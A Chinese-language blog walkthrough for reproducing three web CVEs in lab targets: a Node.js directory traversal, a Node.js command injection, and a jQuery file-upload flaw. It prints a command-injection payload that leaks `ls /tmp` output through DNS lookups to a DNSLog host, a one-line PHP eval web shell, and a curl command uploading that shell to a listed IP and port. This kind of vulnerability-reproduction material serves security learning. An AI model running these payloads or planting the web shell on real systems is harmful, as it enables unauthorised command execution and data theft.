框架安全&CVE复现&Django&Flask&Node.JS&JQuery

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform

获取一个url

这时候套用模板就可以了

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

直接替换上

然后访问

这个时候我们回到那个工具网站

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

然后写一个一句话木马

php 复制代码
<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

复制代码
curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

/jquery-upload-file/

相关推荐
饮长安千年月27 分钟前
玄机-第八章 内存马分析-java03-fastjson
开发语言·python·安全·web安全·网络安全·应急响应
冰糖拌麻子2 小时前
Metasploitable2靶场全部漏洞超详细讲解(含Metasploitable2靶场下载)
网络·安全·网络安全·系统安全·网络攻击模型
麦麦大数据2 小时前
F046 新闻推荐可视化大数据系统vue3+flask+neo4j
python·flask·vue3·知识图谱·neo4j·推荐算法
Fnetlink15 小时前
网络安全与数字化转型的价值投资
安全·web安全
linuxxx11012 小时前
django测试缓存命令的解读
python·缓存·django
云边云科技53412 小时前
云边云科技SD-WAN解决方案 — 构建安全、高效、智能的云网基石
网络·科技·安全·架构·it·sdwan
414a12 小时前
LingJing(灵境)桌面级靶场平台新增靶机:加密攻防新挑战:encrypt-labs靶场,全面提升安全研究者的实战能力!
安全·渗透测试·lingjing·lingjing(灵境)·网络安全靶场平台
上海云盾-高防顾问13 小时前
智能汽车的“软肋”:车载系统漏洞分析与安全防护框架初探?
安全·车载系统·汽车
q***333713 小时前
数据库高安全—openGauss安全整体架构&安全认证
数据库·安全·架构
jenchoi41314 小时前
【2025-11-12】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm